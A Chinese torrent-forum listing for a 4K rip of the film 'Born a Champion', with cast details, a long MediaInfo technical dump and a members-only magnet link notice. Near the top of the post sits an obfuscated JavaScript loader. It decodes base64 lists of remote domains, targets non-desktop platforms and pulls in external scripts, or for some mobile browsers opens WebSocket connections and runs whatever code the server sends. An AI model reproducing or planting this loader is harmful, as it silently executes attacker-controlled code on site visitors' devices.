新王加冕[双语字幕]Born.a.Champion.2021.2160p.HDR.UHD.BluRay.DTS-HD.MA.5.1.x265-10bit-迅雷下载 13.29GB

版主小s 14天前 301

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译  名 新王加冕 / Mickey Kelley
◎片  名 Born a Champion
◎年  代 2020
◎产  地 美国
◎类  别 剧情 / 传记 / 运动
◎语  言 英语
◎上映日期 2021-01-22(美国)
◎IMDb链接 https://www.imdb.com/title/tt10661710/
◎豆瓣评分 7.6/10 (1436人评价)
◎豆瓣链接 https://movie.douban.com/subject/34884701/
◎片  长 112分钟
◎导  演 亚历克斯兰阿瑞佛罗 Alex Ranarivelo (id:1304051)
◎编  剧 肖恩·派特里克·弗兰纳里 Sean Patrick Flanery (id:1027166)
       亚历克斯兰阿瑞佛罗 Alex Ranarivelo (id:1304051)
◎演  员 肖恩·派特里克·弗兰纳里 Sean Patrick Flanery (id:1027166)
       莫里斯·孔特 Maurice Compte (id:1331640)
       卡特里娜·宝登 Katrina Bowden (id:1049568)
       丹尼斯·奎德 Dennis Quaid (id:1002679)
       雷诺·维尔森 Reno Wilson (id:1004780)
       库里·格拉汉姆 Currie Graham (id:1101386)
       科斯塔斯·曼迪勒 Costas Mandylor (id:1049669)
       埃德森?巴博萨 Edson Barboza (id:1450714)
       米奇?高尔 Mickey Gall (id:1450713)
       阿里·阿夫沙尔 Ali Afshar (id:1274728)
       克里斯汀·基默 Christine Kilmer (id:1423180)
       保罗J艾乐西 Paul J. Alessi (id:1307610)
       伦佐·格雷西 Renzo Gracie (id:1389702)
       马歇尔·菲尔 Marshelle Fair (id:1375998)
       威廉·W·巴伯 William W. Barbour (id:1393373)
       Joe Mahon Joe Mahon (id:1217480)

◎标  签 柔术 / 动作 / 美国 / 拳击 / 美国电影 / 2021 / 电影 / mma

◎简  介
  米基·凯利,巴西柔术界第一批美国黑带选手之一,他远离了他所热爱的一切,参加了一场未经批准的MMA锦标赛。

  1. General
  2. Unique ID                                : 215369280359487508028237841172295086249 (0xA2069D576101A116BAFC811BEF0C70A9)
  3. Complete name                            : Born.a.Ch[email protected]BBQDDQ.COM.mkv
  4. Format                                   : Matroska
  5. Format version                           : Version 4
  6. File size                                : 13.3 GiB
  7. Duration                                 : 1 h 51 min
  8. Overall bit rate mode                    : Variable
  9. Overall bit rate                         : 17.1 Mb/s
  10. Movie name                               : Born a Champion 2021 2160p HDR UHD BluRay DTS-HD MA 5.1 [email protected]
  11. Encoded date                             : UTC 2021-07-19 04:04:04
  12. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit
  13. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2
  14. Video
  15. ID                                       : 1
  16. Format                                   : HEVC
  17. Format/Info                              : High Efficiency Video Coding
  18. Format profile                           : Main [email protected]@High
  19. HDR format                               : SMPTE ST 2086, HDR10 compatible
  20. Codec ID                                 : V_MPEGH/ISO/HEVC
  21. Duration                                 : 1 h 51 min
  22. Bit rate                                 : 15.2 Mb/s
  23. Width                                    : 3 840 pixels
  24. Height                                   : 1 600 pixels
  25. Display aspect ratio                     : 2.40:1
  26. Frame rate mode                          : Constant
  27. Frame rate                               : 23.976 (24000/1001/53354) FPS
  28. Color space                              : YUV
  29. Chroma subsampling                       : 4:2:0
  30. Bit depth                                : 10 bits
  31. Bits/(Pixel*Frame)                       : 0.103
  32. Stream size                              : 11.8 GiB (89%)
  33. Title                                    : @HDSky
  34. Writing library                          : x265 - H.265/HEVC codec
  35. Default                                  : Yes
  36. Forced                                   : No
  37. Color range                              : Limited
  38. Color primaries                          : BT.2020
  39. Transfer characteristics                 : PQ
  40. Matrix coefficients                      : BT.2020 non-constant
  41. Mastering display color primaries        : Display P3
  42. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2
  43. Maximum Content Light Level              : 739 cd/m2
  44. Maximum Frame-Average Light Level        : 331 cd/m2
  45. Audio
  46. ID                                       : 2
  47. Format                                   : DTS XLL
  48. Format/Info                              : Digital Theater Systems
  49. Commercial name                          : DTS-HD Master Audio
  50. Codec ID                                 : A_DTS
  51. Duration                                 : 1 h 51 min
  52. Bit rate mode                            : Variable
  53. Bit rate                                 : 1 812 kb/s
  54. Channel(s)                               : 6 channels
  55. Channel layout                           : C L R Ls Rs LFE
  56. Sampling rate                            : 48.0 kHz
  57. Frame rate                               : 93.750 FPS (512 SPF)
  58. Bit depth                                : 16 bits
  59. Compression mode                         : Lossless
  60. Stream size                              : 1.41 GiB (11%)
  61. Title                                    : English
  62. Language                                 : English
  63. Default                                  : Yes
  64. Forced                                   : No
  65. Text #1
  66. ID                                       : 3
  67. Format                                   : PGS
  68. Muxing mode                              : zlib
  69. Codec ID                                 : S_HDMV/PGS
  70. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  71. Duration                                 : 1 h 46 min
  72. Bit rate                                 : 47.0 kb/s
  73. Count of elements                        : 2285
  74. Stream size                              : 35.9 MiB (0%)
  75. Title                                    : CHS
  76. Language                                 : Chinese
  77. Default                                  : Yes
  78. Forced                                   : No
  79. Text #2
  80. ID                                       : 4
  81. Format                                   : PGS
  82. Muxing mode                              : zlib
  83. Codec ID                                 : S_HDMV/PGS
  84. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  85. Duration                                 : 1 h 46 min
  86. Bit rate                                 : 48.0 kb/s
  87. Count of elements                        : 2285
  88. Stream size                              : 36.7 MiB (0%)
  89. Title                                    : CHT
  90. Language                                 : Chinese
  91. Default                                  : No
  92. Forced                                   : No
  93. Text #3
  94. ID                                       : 5
  95. Format                                   : PGS
  96. Muxing mode                              : zlib
  97. Codec ID                                 : S_HDMV/PGS
  98. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  99. Duration                                 : 1 h 46 min
  100. Bit rate                                 : 74.6 kb/s
  101. Count of elements                        : 2285
  102. Stream size                              : 57.1 MiB (0%)
  103. Title                                    : CHS&ENG
  104. Language                                 : Chinese
  105. Default                                  : No
  106. Forced                                   : No
  107. Text #4
  108. ID                                       : 6
  109. Format                                   : PGS
  110. Muxing mode                              : zlib
  111. Codec ID                                 : S_HDMV/PGS
  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  113. Duration                                 : 1 h 46 min
  114. Bit rate                                 : 75.7 kb/s
  115. Count of elements                        : 2285
  116. Stream size                              : 57.9 MiB (0%)
  117. Title                                    : CHT&ENG
  118. Language                                 : Chinese
  119. Default                                  : No
  120. Forced                                   : No
  121. Menu
  122. 00:00:00.000                             : en:Chapter 01
  123. 00:07:43.588                             : en:Chapter 02
  124. 00:16:48.923                             : en:Chapter 03
  125. 00:26:38.762                             : en:Chapter 04
  126. 00:34:39.702                             : en:Chapter 05
  127. 00:42:50.108                             : en:Chapter 06
  128. 00:52:11.293                             : en:Chapter 07
  129. 01:00:38.885                             : en:Chapter 08
  130. 01:07:41.639                             : en:Chapter 09
  131. 01:19:44.069                             : en:Chapter 10
  132. 01:30:05.858                             : en:Chapter 11
  133. 01:40:18.761                             : en:Chapter 12



此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 剧情 运动 传记

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回